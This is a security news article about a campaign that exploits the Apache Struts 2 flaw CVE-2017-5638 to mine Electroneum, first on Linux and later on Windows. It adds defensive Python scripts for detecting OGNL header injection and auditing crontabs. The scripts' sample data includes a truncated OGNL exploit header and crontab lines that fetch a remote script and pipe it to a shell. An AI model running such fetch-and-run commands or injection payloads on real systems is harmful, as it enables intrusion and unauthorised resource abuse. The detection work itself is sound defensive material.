Hackers use an Apache Struts 2 vulnerability for cryptomining, and now the target is Windows systems

F5 Networks said in a statement last Wednesday that it has been tracking malicious activity built on the Apache Struts 2 remote code execution (RCE) vulnerability CVE-2017-5638 since July 2017. In the initial campaign, the attackers mainly used this vulnerability to infect Struts servers running on Linux in order to mine the Electroneum (ETN) cryptocurrency.

Over time, the attackers seem to have decided to expand their mining operation to new targets. In the latest activity, F5 Networks researchers found that mining campaigns exploiting CVE-2017-5638 are still underway. Although the goal is still to mine the same cryptocurrency (Electroneum), the attacks have been extended to Windows systems rather than Linux systems alone.

Apache Struts is an open source MVC framework, maintained by the Apache Software Foundation, for building enterprise Java web applications.

CVE-2017-5638 was publicly disclosed in March 2017 (Apache advisory S2-045) and affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10. The flaw is in the Jakarta Multipart parser used for file uploads: when an attacker sends a crafted Content-Type header, its contents are evaluated as an OGNL expression while the error message is being built, which leads to unauthenticated remote code execution. It was fixed in Struts 2.3.32 and 2.5.10.1.
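As an added illustration (this is not code from the F5 Networks report), the script below does the two checks a defender wants for this bug: it flags the public exploitation signature, OGNL markers inside a Content-Type header, in a raw HTTP request, and it checks a Struts version string against the affected ranges above. The sample requests, the host name and the truncated "suspect" header are constructed for this example; the suspect header is not a working payload.

```python
"""Added example (not code from the F5 Networks report): spot CVE-2017-5638
(Apache advisory S2-045) exploitation attempts in a raw HTTP request, and
check a Struts version string against the affected ranges.

Assumptions: requests are parsed from a raw text dump with CRLF line endings;
the sample headers below are constructed, and the "suspect" one is a truncated
illustration of the public signature (OGNL in Content-Type), not a working payload.
"""
import re

# Affected ranges from the advisory: 2.3.5 - 2.3.31 and 2.5 - 2.5.10.
# Fixed in 2.3.32 and 2.5.10.1.
AFFECTED_RANGES = [((2, 3, 5), (2, 3, 31)), ((2, 5, 0), (2, 5, 10))]


def parse_version(version):
    """'2.5.10.1' -> (2, 5, 10, 1); short versions are padded to three parts."""
    parts = [int(p) for p in version.strip().split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected(version):
    """True if the version lies in an affected range. Four-part fix releases such
    as 2.5.10.1 sort after 2.5.10 in tuple comparison, so they are not flagged."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


# OGNL markers that have no business in a Content-Type header.
OGNL_MARKERS = re.compile(
    r"(%\{|\$\{|#_memberAccess|#context|#cmd=|@java\.lang\.Runtime@|\bognl\b)",
    re.I)


def parse_request_headers(raw_request):
    """Return (request_line, {lower-cased header name: value}) for a raw request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def s2_045_indicators(raw_request):
    """Sorted, lower-cased list of OGNL markers found in the Content-Type header
    (empty for a normal multipart upload)."""
    _, headers = parse_request_headers(raw_request)
    content_type = headers.get("content-type", "")
    return sorted({m.lower() for m in OGNL_MARKERS.findall(content_type)})


# Constructed sample requests (host name is made up).
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4\r\n"
    "\r\n")
# The exploit keeps the literal 'multipart/form-data' so Struts still routes
# the request to the Jakarta parser, then appends OGNL; truncated on purpose.
SUSPECT_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#_memberAccess=#dm).(#cmd='id')}\r\n"
    "\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_UPLOAD), ("suspect", SUSPECT_UPLOAD)):
        print(name, s2_045_indicators(req))
    for v in ("2.3.31", "2.3.32", "2.5", "2.5.10", "2.5.10.1"):
        print(v, "affected" if is_affected(v) else "not affected")
```

The header check is deliberately broad: a legitimate multipart upload never carries `%{`, `${` or `#_memberAccess` in its Content-Type, so any hit is worth an alert even if the rest of the expression is obfuscated.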

In the initial campaign, the attackers injected a Linux shell payload that used the wget and curl tools present on most Linux systems to download the mining malware, and then added it as a persistent cron job.
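As an added example (not code from the F5 Networks report), here is a small crontab audit that looks for the download-and-run persistence pattern just described: an entry that fetches a remote file with wget or curl, pipes it into a shell, or executes from a world-writable directory. The sample crontab and the 198.51.100.7 address are constructed for this example.

```python
"""Added example (not code from the F5 Networks report): audit crontab entries
for the download-and-run persistence the Linux campaign used (wget/curl fetching
a remote file, often piped to a shell or executed from /tmp).

Assumptions: input is crontab text in per-user format; the sample crontab and
the 198.51.100.7 address below are constructed for this example.
"""
import re

DOWNLOADER = re.compile(r"\b(wget|curl)\b", re.I)
REMOTE_URL = re.compile(r"\bhttps?://[^\s'\"]+", re.I)
PIPED_TO_SHELL = re.compile(r"\|\s*(ba|da)?sh\b")
WRITABLE_DIR = re.compile(r"/(tmp|var/tmp|dev/shm)/")


def parse_cron_line(line):
    """Return (schedule, command) for a job line, or None for blank lines,
    comments and VAR=value assignments."""
    s = line.strip()
    if not s or s.startswith("#") or "=" in s.split()[0]:
        return None
    if s.startswith("@"):                 # @reboot, @daily, ...
        parts = s.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    fields = s.split(None, 5)             # five time fields, then the command
    if len(fields) < 6:
        return None
    return " ".join(fields[:5]), fields[5]


def suspicious_cron_entries(crontab_text):
    """List of (line number, command, reasons) for entries that look like
    remote download-and-execute persistence."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        _, command = parsed
        reasons = []
        if DOWNLOADER.search(command) and REMOTE_URL.search(command):
            reasons.append("downloads from a remote URL")
        if PIPED_TO_SHELL.search(command):
            reasons.append("pipes output into a shell")
        if WRITABLE_DIR.search(command):
            reasons.append("runs from a world-writable directory")
        if reasons:
            findings.append((lineno, command, reasons))
    return findings


# Constructed sample crontab: one normal job, one environment line, and two
# entries of the kind the miner left behind.
SAMPLE_CRONTAB = "\n".join([
    "# m h dom mon dow command",
    "0 3 * * * /usr/local/bin/backup.sh",
    "PATH=/usr/local/bin:/usr/bin:/bin",
    "*/5 * * * * curl -s http://198.51.100.7/x.sh | sh",
    "@reboot wget -q -O /tmp/.m http://198.51.100.7/m && chmod +x /tmp/.m && /tmp/.m",
])

if __name__ == "__main__":
    for lineno, command, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {lineno}: {command}")
        for reason in reasons:
            print(f"    - {reason}")
```

On a real host, feed it the output of `crontab -l` for each user plus the files under /etc/cron.d; entries scheduled every few minutes that re-download a file are the ones to pull for analysis first, since that is how a miner re-installs itself after being killed.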

In mid-March 2018, F5 Networks researchers observed a change in the campaign: the injected payload now targets Struts servers running on Windows.

F5 Networks believes that cryptocurrency mining campaigns are becoming more and more common because of their profitability, even though the operators of this particular campaign appear to have made major mistakes in their decision-making. The campaign nonetheless confirms how important it is to install security patches for publicly disclosed vulnerabilities. To avoid becoming someone else's profit-making tool, patching the Apache Struts 2 vulnerability and deploying firewall policies that block exploitation attempts should be completed as quickly as possible.